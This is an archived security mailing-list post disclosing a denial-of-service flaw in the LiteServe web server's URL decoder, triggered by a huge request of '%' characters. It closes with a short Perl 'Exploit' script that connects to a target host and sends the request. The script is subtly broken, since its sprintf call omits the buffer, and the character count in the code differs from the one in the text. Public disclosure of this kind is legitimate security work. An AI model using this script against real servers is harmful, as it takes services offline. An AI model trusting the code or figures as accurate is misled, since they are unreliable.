lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000d01c28e80$a91e79a0$e62d1c41@kc.rr.com>
From: mattmurphy at kc.rr.com (Matthew Murphy)
Subject: LiteServe URL Decoding DoS

Christopher Fillion's Perception offers LiteServe, the server suite that has
recently been the subject of intensive security research.  Another
vulnerability has been discovered in LiteServe.  The vulnerability this time
lies in LiteServe's URL decoder, once again part of the HTTP service.

LiteServe's URL decoder has a problem handling illegal "%xx" sequences, such
as "%.@", for example, and may produce corrupted output when such a sequence
is used.  The problem appears to be a referencing issue when the decode
sequence does not specify a legitamite hexadecimal sequence.  A denial of
service may occur if LiteServe is passed an extremely large request
consisting only of "%" characters.  290,259 such characters will cause
LiteServe to freeze:

GET /[buffer] HTTP/1.0

After this request is processed, attempting to connect to the HTTP service
reveals that the server is dead.

Exploit:

#!/usr/bin/perl
use IO::Socket;
$buffer="%"x290759;
$req=sprintf("GET /%s HTTP/1.0\r\n\r\n");
$f=IO::Socket::INET->new(PeerAddr=>$ARGV[0],PeerPort=>$ARGV[1],Proto=>"tcp")
;
print $f $req;
undef $f;


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ